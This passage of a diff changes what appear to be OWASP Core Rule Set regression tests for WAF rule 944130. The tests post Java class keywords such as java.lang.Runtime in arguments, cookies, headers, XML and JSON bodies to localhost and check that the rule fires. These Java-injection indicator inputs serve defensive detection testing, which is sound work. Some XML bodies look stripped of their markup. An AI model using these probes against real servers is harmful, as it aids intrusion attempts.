"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.lang.Runtime=test" - output: - log_contains: "id \"944130\"" - - test_title: 944130-344 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.lang.Runtime=test" + output: + log: + expect_ids: [944130] + - test_id: 344 desc: "Cookie test includes keyword java.lang.Runtime" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=java.lang.Runtime - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-345 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.lang.Runtime + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 345 desc: "Cookie name includes keyword java.lang.Runtime" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: java.lang.Runtime=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-346 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.lang.Runtime=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 346 desc: "Request header test includes keyword java.lang.Runtime" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: java.lang.Runtime - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-347 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.lang.Runtime + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 347 desc: "XML attribute value includes keyword java.lang.Runtime" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-348 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944130] + - test_id: 348 desc: "XML element value includes keyword java.lang.Runtime" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.lang.Runtime" - output: - log_contains: "id \"944130\"" - - test_title: 944130-349 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.lang.Runtime" + output: + log: + expect_ids: [944130] + - test_id: 349 desc: "Nested XML element value includes keyword java.lang.Runtime" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.lang.Runtime" - output: - log_contains: "id \"944130\"" - - test_title: 944130-350 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.lang.Runtime" + output: + log: + expect_ids: [944130] + - test_id: 350 desc: "Content-Type text/plain includes keyword java.lang.Runtime" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.lang.Runtime" - output: - log_contains: "id \"944130\"" - - test_title: 944130-351 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.lang.Runtime" + output: + log: + expect_ids: [944130] + - test_id: 351 desc: "Content-Type application/json arg value includes keyword java.lang.Runtime" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"java.lang.Runtime\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-352 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"java.lang.Runtime\"}" + output: + log: + expect_ids: [944130] + - test_id: 352 desc: "Content-Type application/json arg name includes keyword java.lang.Runtime" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"java.lang.Runtime\": \"test\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-353 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"java.lang.Runtime\": \"test\"}" + output: + log: + expect_ids: [944130] + - test_id: 353 desc: "Argument test includes keyword java.lang.String" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.lang.String" - output: - log_contains: "id \"944130\"" - - test_title: 944130-354 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.lang.String" + output: + log: + expect_ids: [944130] + - test_id: 354 desc: "Argument name includes keyword java.lang.String" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.lang.String=test" - output: - log_contains: "id \"944130\"" - - test_title: 944130-355 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.lang.String=test" + output: + log: + expect_ids: [944130] + - test_id: 355 desc: "Cookie test includes keyword java.lang.String" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=java.lang.String - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-356 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.lang.String + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 356 desc: "Cookie name includes keyword java.lang.String" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: java.lang.String=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-357 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.lang.String=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 357 desc: "Request header test includes keyword java.lang.String" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: java.lang.String - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-358 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.lang.String + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 358 desc: "XML attribute value includes keyword java.lang.String" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-359 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944130] + - test_id: 359 desc: "XML element value includes keyword java.lang.String" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.lang.String" - output: - log_contains: "id \"944130\"" - - test_title: 944130-360 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.lang.String" + output: + log: + expect_ids: [944130] + - test_id: 360 desc: "Nested XML element value includes keyword java.lang.String" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.lang.String" - output: - log_contains: "id \"944130\"" - - test_title: 944130-361 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.lang.String" + output: + log: + expect_ids: [944130] + - test_id: 361 desc: "Content-Type text/plain includes keyword java.lang.String" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.lang.String" - output: - log_contains: "id \"944130\"" - - test_title: 944130-362 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.lang.String" + output: + log: + expect_ids: [944130] + - test_id: 362 desc: "Content-Type application/json arg value includes keyword java.lang.String" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"java.lang.String\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-363 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"java.lang.String\"}" + output: + log: + expect_ids: [944130] + - test_id: 363 desc: "Content-Type application/json arg name includes keyword java.lang.String" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"java.lang.String\": \"test\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-364 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"java.lang.String\": \"test\"}" + output: + log: + expect_ids: [944130] + - test_id: 364 desc: "Argument test includes keyword java.lang.StringBuilder" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.lang.StringBuilder" - output: - log_contains: "id \"944130\"" - - test_title: 944130-365 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.lang.StringBuilder" + output: + log: + expect_ids: [944130] + - test_id: 365 desc: "Argument name includes keyword java.lang.StringBuilder" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.lang.StringBuilder=test" - output: - log_contains: "id \"944130\"" - - test_title: 944130-366 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.lang.StringBuilder=test" + output: + log: + expect_ids: [944130] + - test_id: 366 desc: "Cookie test includes keyword java.lang.StringBuilder" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=java.lang.StringBuilder - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-367 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.lang.StringBuilder + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 367 desc: "Cookie name includes keyword java.lang.StringBuilder" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: java.lang.StringBuilder=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-368 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.lang.StringBuilder=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 368 desc: "Request header test includes keyword java.lang.StringBuilder" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: java.lang.StringBuilder - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-369 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.lang.StringBuilder + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 369 desc: "XML attribute value includes keyword java.lang.StringBuilder" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-370 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944130] + - test_id: 370 desc: "XML element value includes keyword java.lang.StringBuilder" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.lang.StringBuilder" - output: - log_contains: "id \"944130\"" - - test_title: 944130-371 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.lang.StringBuilder" + output: + log: + expect_ids: [944130] + - test_id: 371 desc: "Nested XML element value includes keyword java.lang.StringBuilder" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" 